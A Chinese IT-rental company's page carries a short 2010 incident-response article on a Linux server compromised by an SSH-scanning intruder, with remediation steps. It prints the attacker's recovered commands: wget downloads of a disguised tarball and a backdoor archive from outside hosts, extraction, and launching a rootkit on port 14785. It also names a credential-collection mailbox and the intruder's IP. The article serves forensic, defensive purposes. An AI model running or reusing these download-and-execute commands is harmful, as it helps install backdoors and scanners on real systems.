中文版  English 
远志IT租赁
小型机租赁| IBM P系列小型机 | HP 9000 小型机 | HP 动能服务器 | SUN 小型机 | PC服务器租赁 | IBM X系列服务器 | HP PC服务器 |
SUN X86服务器 | DELL 服务器 | 存储租赁 | IBM 磁盘阵列 | HP 磁盘阵列 | SUN 磁盘阵列 | DELL 磁盘阵列 | 磁带库 | EMC存储 |
小型机配件 | IBM小型机配件 | HP小型机配件 | SUN小型机配件 | 网络设备租赁 | 路由器 | 交换机 | 防火墙 | 台式电脑租赁 |
笔记本电脑租赁 | 联想 | 惠普| 戴尔 | 三星 | 东芝 | 华硕 | 宏基 | 打印机租赁 | 大幅面打印机 | 激光打印机| 一体机 | 复印机.复合机 |
投影机租赁 | 爱普生/EPSON| 夏普| 苹果租赁 | Iphone手机租赁| Ipad平板电脑租赁| Mac电脑租赁| IpodMP3播放器租赁| Nexus7租赁 |
首页|   服务器租赁|   小型机租赁|   存储租赁|   网络设备租赁|   笔记本租赁|   投影仪租赁|   打印机租赁|   小型机配件|   租赁专题|   动态|   资料|   培训|   服务

当linux服务器遭遇入侵该怎么办--北京远志IT租赁-小型机租赁|服务器租赁|小型机配件|EMC配件|HDS配件|电脑租赁|网络设备租赁
您所在的位置  首页 -> 小型机实验室培训
当linux服务器遭遇入侵该怎么办

小型机实验室培训    阅读:7878    文章来源:远志IT租赁     发布时间:2010/10/20

当一台linux服务器老向外ssh扫描,登陆到服务器上,查看进程发现大量ssh-scan在运行,运行用户为mircte,查找ssh-scan这个文件,确定所在位置/var/log目录下。

黑客进入服务器后所做的操作:

1、向/var/tmp/下上传了两个恶意程序

其中wtf为向外扫描其它服务器的ssh-scan黑客软件,.access.log文件下存放有rootkit后门,服务器被当成了肉鸡跳板,开放14785端口等待入侵者连接,扫描其它服务器所得到的账号都发送到diavolu_gol@yahoo.com这个邮箱。

2、入侵者登陆记录

85.120.78.140的IP来自罗马尼亚。

3、wget http://pinky.clan.su/scan/wtf.jpg; tar zxvf wtf.jpg

wget adelinuangell.lx.ro/ryo.tar

tar xvf ryo.tar

cd 、.access.log

。/config Ady 14785

。/run

结束进程。
删掉程序。
删掉用户。
修改root密码。

 

 

小型机实验室培训
  · 小型机实验室培训业务简介  
  · 小型机实验室培训的主要客户类型  
  · 小型机实验室培训环境列表  
  · Unix操作系统实验培训环境  
  · 卷管理软件实验培训环境  
  · 集群管理软件实验培训环境  
  · 数据备份软件实验培训环境  
  · 数据库软件实验培训环境  
 
热点排行
  ·IBM DS4300电池库存现货热销 
  ·远志新到IBM P690小型机配件 
  ·远志IBM ds5020存储租赁|IBM服务器租赁 
  ·SUN服务器租赁-SUN T5140服务器租赁 
  ·新到IBM服务器配件|IBM小型机配件 
  ·SUN服务器租赁-SUN 6140存储租赁 
  ·如何更换IBM DS4700电池 
  ·IBM小型机配件故障定位 
  ·EMC存储租赁-CX系列为什么最少需要5块硬盘? 
  ·IBM P6 570(9117-MMA)适用小型机配件 
  ·IBM小型机租赁中HA故障定位及解决方法 
  ·新到IBM P6 550(8203-E8A)适用小型机配件 
首页 | 关于远志 | 企业文化 | 成功案例 | 联系我们 | 诚聘英才 | 申请友情链接
北京远志IT租赁电脑租赁小型机租赁服务器租赁存储租赁网络设备租赁打印机租赁
地址:北京市昌平区北清创意园2号楼3单元101室
总机: 010-51669896 电话:13801134812
网络许可证:京ICP备13023975号-2号 京公网安备110108002524号 北京远志宏达科技发展有限公司版权所有